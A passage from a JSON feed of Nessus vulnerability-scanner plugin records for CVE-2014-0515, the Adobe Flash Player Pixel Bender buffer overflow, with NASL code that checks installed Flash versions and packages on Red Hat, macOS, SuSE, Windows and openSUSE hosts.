(CVE-2014-0515)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 11.2.202.356.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-13.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:0447\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0515\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-plugin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player Shader Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/30\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:0447\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"flash-plugin-11.2.202.356-1.el5\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", reference:\"flash-plugin-11.2.202.356-1.el6\")) flag++;\n\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. 
This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:16:23", "description": "According to its version, the instance of Flash Player installed on the remote Mac OS X host is equal to or earlier than 11.7.700.275 / 11.8.x / 11.9.x / 12.x / 13.0.0.201. It is, therefore, potentially affected by a buffer overflow vulnerability due to improper user input validation in the Pixel Bender component. 
An attacker could cause a buffer overflow with a specially crafted SWF file, resulting in arbitrary code execution.", "cvss3": {}, "published": "2014-04-28T00:00:00", "type": "nessus", "title": "Flash Player for Mac <= 11.7.700.275 / 13.0.0.201 Pixel Bender Component Buffer Overflow (APSB14-13)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2019-11-26T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "MACOSX_FLASH_PLAYER_13_0_0_206.NASL", "href": "https://www.tenable.com/plugins/nessus/73741", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73741);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0515\");\n script_bugtraq_id(67092);\n\n script_name(english:\"Flash Player for Mac <= 11.7.700.275 / 13.0.0.201 Pixel Bender Component Buffer Overflow (APSB14-13)\");\n script_summary(english:\"Checks version of Flash Player\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host has a browser plugin that is affected by a\nbuffer overflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the instance of Flash Player installed on\nthe remote Mac OS X host is equal or prior to 11.7.700.275 / 11.8.x /\n11.9.x / 12.x / 13.0.0.201. It is, therefore, potentially affected by\na buffer overflow vulnerability due to improper user input validation\nin the Pixel Bender component. 
An attacker could cause a buffer\noverflow with a specially crafted SWF file, resulting in arbitrary\ncode execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-13.html\");\n # https://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5043fc7b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 11.7.700.279 / 13.0.0.206 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0515\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player Shader Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_flash_player_installed.nasl\");\n script_require_keys(\"MacOSX/Flash_Player/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Flash_Player/Version\");\npath = get_kb_item_or_exit(\"MacOSX/Flash_Player/Path\");\n\n# nb: we're checking for versions less than *or equal to* the cutoff!\nextended_cutoff_version = \"11.7.700.275\";\nextended_fixed_version = \"11.7.700.279\";\n\nstandard_cutoff_version = \"13.0.0.201\";\nstandard_fixed_version = \"13.0.0.206\";\n\nfixed_version_for_report = NULL;\n\nif (version =~ \"^([0-9]|10)\\.|^11\\.[0-6]\")\n fixed_version_for_report = extended_fixed_version;\n\nelse if (\n version =~ \"^11\\.7\\.\" &&\n ver_compare(ver:version, fix:extended_cutoff_version, strict:FALSE) <= 0\n) fixed_version_for_report = extended_fixed_version;\n\nelse if (version =~ \"^11\\.[89]\\.\" || version =~ \"^12\\.\")\n fixed_version_for_report = standard_fixed_version;\nelse if (\n version =~ \"^13\\.0\\.0\\.\" &&\n ver_compare(ver:version, fix:standard_cutoff_version, strict:FALSE) <= 0\n) fixed_version_for_report = standard_fixed_version;\n\nif (!isnull(fixed_version_for_report))\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version_for_report +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Flash Player for Mac\", version, path);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:17:04", "description": "This flash-player update to version 11.2.202.356 fixes the following critical security issue :\n\n - buffer overflow vulnerability that leads to arbitrary code execution (CVE-2014-0515) Adobe Security Bulletin (APSB14-13)
http://helpx.adobe.com/security/products/flash-player/apsb14-13.html. (bnc#875577)", "cvss3": {}, "published": "2014-05-03T00:00:00", "type": "nessus", "title": "SuSE 11.3 Security Update : flash-player (SAT Patch Number 9180)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:flash-player", "p-cpe:/a:novell:suse_linux:11:flash-player-gnome", "p-cpe:/a:novell:suse_linux:11:flash-player-kde4", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_FLASH-PLAYER-140429.NASL", "href": "https://www.tenable.com/plugins/nessus/73850", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73850);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-0515\");\n\n script_name(english:\"SuSE 11.3 Security Update : flash-player (SAT Patch Number 9180)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This flash-player update to version 11.2.202.356 fixes the following\ncritical security issue :\n\n - buffer overflow vulnerability that leads to arbitrary\n code execution (CVE-2014-0515) Adobe Security Bulletin\n (APSB14-13)\n http://helpx.adobe.com/security/products/flash-player/ap\n sb14-13.html. 
(bnc#875577)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=875577\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0515.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 9180.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player Shader Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n 
exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-11.2.202.356-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-gnome-11.2.202.356-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-kde4-11.2.202.356-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-11.2.202.356-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.356-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-kde4-11.2.202.356-0.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:14:32", "description": "Versions of Adobe Flash player prior to 11.7.700.279 / 13.0.0.206 are outdated and thus unpatched for an overflow condition in the pixel bender component. The issue is triggered as user-supplied input is not properly validated. 
With a specially crafted SWF file, a context-dependent attacker can cause a buffer overflow, resulting in a denial of service or potentially allowing the execution of arbitrary code. (CVE-2014-0515)", "cvss3": {}, "published": "2015-07-10T00:00:00", "type": "nessus", "title": "Flash Player < 11.7.700.279 / 13.0.0.206 Buffer Overflow (APSB14-13)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "8805.PRM", "href": "https://www.tenable.com/plugins/nnm/8805", "sourceData": "Binary data 8805.prm", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:16:14", "description": "According to its version, the instance of Flash Player installed on the remote Windows host is equal to or earlier than 11.7.700.275 / 11.8.x / 11.9.x / 12.x / 13.0.0.182. It is, therefore, potentially affected by a buffer overflow vulnerability due to improper user input validation in the Pixel Bender component. 
An attacker could cause a buffer overflow with a specially crafted SWF file, resulting in arbitrary code execution.", "cvss3": {}, "published": "2014-04-28T00:00:00", "type": "nessus", "title": "Flash Player <= 11.7.700.275 / 13.0.0.182 Pixel Bender Component Buffer Overflow (APSB14-13)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "FLASH_PLAYER_APSB14-13.NASL", "href": "https://www.tenable.com/plugins/nessus/73740", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73740);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-0515\");\n script_bugtraq_id(67092);\n\n script_name(english:\"Flash Player <= 11.7.700.275 / 13.0.0.182 Pixel Bender Component Buffer Overflow (APSB14-13)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin that is affected by a\nbuffer overflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the instance of Flash Player installed on\nthe remote Windows host is equal or prior to 11.7.700.275 / 11.8.x /\n11.9.x / 12.x / 13.0.0.182. It is, therefore, potentially affected by\na buffer overflow vulnerability due to improper user input validation\nin the Pixel Bender component. 
An attacker could cause a buffer\noverflow with a specially crafted SWF file, resulting in arbitrary\ncode execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-13.html\");\n # https://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5043fc7b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 11.7.700.279 / 13.0.0.206 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0515\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player Shader Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Flash_Player/installed\");\n\n# Identify vulnerable versions.\ninfo = \"\";\n\n# we're checking for versions less than *or equal to* the cutoff!\nforeach variant (make_list(\"Plugin\", \"ActiveX\", \"Chrome\", \"Chrome_Pepper\"))\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n if (!isnull(vers) && !isnull(files))\n {\n foreach key (keys(vers))\n {\n ver = vers[key];\n\n if (ver)\n {\n iver = split(ver, sep:'.', keep:FALSE);\n for (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\n if (\n (\n # Chrome Flash <= 13.0.0.182\n variant == \"Chrome_Pepper\" &&\n (iver[0] == 13 && iver[1] == 0 && iver[2] == 0 && iver[3] <= 182)\n ) ||\n (variant != \"Chrome_Pepper\" &&\n (\n # < 11\n iver[0] < 11 ||\n # 11.x <= 11.7.700.275\n (\n iver[0] == 11 &&\n (\n iver[1] < 7 ||\n (\n iver[1] == 7 &&\n (\n iver[2] < 700 ||\n (iver[2] == 700 && iver[3] <= 275)\n )\n )\n )\n ) ||\n # 11.8.x\n (iver[0] == 11 && iver[1] == 8) ||\n # 11.9.x\n (iver[0] == 11 && iver[1] == 9) ||\n # 12.x\n (iver[0] == 12) ||\n\n # 13.0.0.x <= 13.0.0.182\n (\n iver[0] == 13 &&\n (\n iver[1] == 0 &&\n (\n iver[2] == 0 &&\n (\n iver[3] <= 182\n )\n )\n )\n )\n )\n )\n )\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product: Browser Plugin (for Firefox / Netscape / Opera)';\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n }\n else if (\"Chrome\" >< variant)\n {\n info += '\\n Product : Browser Plugin (for Google Chrome)';\n }\n info += '\\n Path : ' + file +\n '\\n Installed 
version : ' + ver;\n if (variant == \"Chrome_Pepper\")\n info += '\\n Fixed version : 13.0.0.206 (Chrome PepperFlash)';\n else\n {\n if (ver =~ \"^11\\.7\")\n fix = \"11.7.700.279\";\n else\n fix = \"13.0.0.206\";\n info += '\\n Fixed version : '+fix;\n }\n info += '\\n';\n }\n }\n }\n }\n}\n\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0) security_hole(port:port, extra:info);\n else security_hole(port);\n}\nelse\n{\n if (thorough_tests)\n exit(0, 'No vulnerable versions of Adobe Flash Player were found.');\n else\n exit(1, 'Google Chrome\\'s built-in Flash Player may not have been detected because the \\'Perform thorough tests\\' setting was not enabled.');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:19:50", "description": "This flash-player update fixes a critical buffer overflow vulnerability that leads to arbitrary code execution.\n\nThe flash-player package was updated to version 11.2.202.356.\n\n - bnc#875577, APSB14-13, CVE-2014-0515", "cvss3": {}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : flash-player (openSUSE-SU-2014:0585-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:flash-player", "p-cpe:/a:novell:opensuse:flash-player-gnome", "p-cpe:/a:novell:opensuse:flash-player-kde4", "cpe:/o:novell:opensuse:12.3", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-322.NASL", "href": "https://www.tenable.com/plugins/nessus/75334", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-322.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75334);\n 
script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-0515\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-SU-2014:0585-1)\");\n script_summary(english:\"Check for the openSUSE-2014-322 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This flash-player update fixes a critical buffer overflow\nvulnerability that leads to arbitrary code execution.\n\nThe flash-player package was updated to version 11.2.202.356.\n\n - bnc#875577, APSB14-13, CVE-2014-0515\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=875577\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-04/msg00065.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player Shader Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 / 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-11.2.202.356-2.72.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-gnome-11.2.202.356-2.72.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-kde4-11.2.202.356-2.72.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-11.2.202.356-46.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", 
